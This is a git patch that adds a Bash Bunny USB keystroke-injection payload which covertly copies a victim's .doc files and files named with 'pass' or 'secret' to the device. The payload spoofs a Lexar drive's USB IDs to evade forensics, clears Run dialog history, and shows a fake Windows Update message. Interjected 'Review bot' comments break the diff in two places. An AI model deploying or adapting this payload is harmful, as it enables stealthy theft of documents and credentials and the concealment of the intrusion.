From 08c24c43898c5c817d0d6a2114097e63c75989e2 Mon Sep 17 00:00:00 2001
From: saintcrossbow
Date: Sun, 26 Nov 2017 20:16:17 -0500
Subject: [PATCH] Added SmartFileExtract payload (#296)
---
 .../SmartFileExtract_Exfiltrator/d.cmd | 4 +++
 .../SmartFileExtract_Exfiltrator/e.cmd | 25 ++++++++++++++++
 .../SmartFileExtract_Exfiltrator/i.vbs | 1 +
 .../SmartFileExtract_Exfiltrator/payload.txt | 29 +++++++++++++++++++
 .../SmartFileExtract_Exfiltrator/readme.md | 1 +
 .../SmartFileExtract_Exfiltrator/setup.txt | 26 +++++++++++++++++
 6 files changed, 86 insertions(+)
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md
 create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd
new file mode 100644
index 00000000..6a9b17a4
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd
@@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd
new file mode 100644
index 00000000..2912df65
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd
@@ -0,0 +1,25 @@
+REM Setup required:
+REM o Create SFE in the loot directory
+REM o Place SmartFileExtract on the root of the bashbunny
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+
+if Exist %USERPROFILE%\Documents (
+%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
+
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs
new file mode 100644
index 00000000..fb7cb768
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs
@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
\ No newline at end of file
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt
new file mode 100644
index 00000000..613546a8
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt
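Review bot: The comment `REM %~d0 = path to this batch file` does not match the line below it, which expands `%~dp0` (drive plus directory of the script), so it should read `REM %~dp0 = drive and directory of this batch file`. The comment just above it also has a typo, `compromised of` where `comprised of` is meant. The `REM Setup required` lines at the top say to create the SFE loot directory by hand, yet the script creates it itself with `mkdir %dst%`; one of the two statements should be corrected so the setup notes and the code agree.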
@@ -0,0 +1,29 @@
+#!/bin/bash
+#
+# Title: ExecutableInstaller
+# Author: IMcPwn (original)
+# Additions: SaintCrossbow (only for the parts to run SFE)
+# Version: 1.0
+# Target: Windows 7+
+#
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
+# using the --startup parameter. Change these settings inside of e.cmd.
+#
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R
+# Note: Acting as Lexar Compact Flash Drive to throw off forensics
+ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
+QUACK DELAY 200
+REM --> Minimize all windows
+QUACK WINDOWS d
+QUACK DELAY 200
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
+QUACK ENTER
+LED G
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md
new file mode 100644
index 00000000..b2f37533
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md
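Review bot: The header comment is stale: it still describes the original ExecutableInstaller (`copies payload.exe from the root of the Bash Bunny and then executes it using the --startup parameter`), but nothing in this commit references payload.exe or a --startup parameter, and e.cmd runs SmartFileExtract instead. The `Title:` line should name this payload rather than ExecutableInstaller, and the description block should say what this variant does, as readme.md and setup.txt in the same commit already do. The comment `Source bunny_helpers.sh to get environment variable SWITCH_POSITION` is also misleading, since SWITCH_POSITION is never read and the QUACK STRING line hardcodes `payloads\switch2\d.cmd`; the comment should state that the switch path is fixed in the string below, so a reader is not led to expect the script to adapt to the switch position.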
@@ -0,0 +1 @@
+# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied.
\ No newline at end of file
diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt
new file mode 100644
index 00000000..04e15654
--- /dev/null
+++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt
@@ -0,0 +1,26 @@
+Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
+See the BashBunny Wiki for the original version.
+
+Setup:
+- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
+ * Quick tip: you only need the SmartFileExtract.exe from the project root
+- Copy SmartFileExtract.exe to the root of the bashubunny
+- Change payload.txt:
+ a) Your file volume name for the bashbunny (if necessary)
+ b) What kind of device you want the bunny to spoof.
+ Note: Very much recommend you do this, otherwise will be picked up by forensics
+- Change e.cmd:
+ a) Change your options for Smart File Extract here.
+
+The default payload included in this distribution:
+- Looks to Forensics like a Lexar drive (but still called BashBunny)
+- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
+- Reports status as a fake install window
+- Stops extract after 90 seconds or 500 MBs
+
+SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
+smartfileextract /help
+
+Good luck!
+
+Saint Crossbow
\ No newline at end of file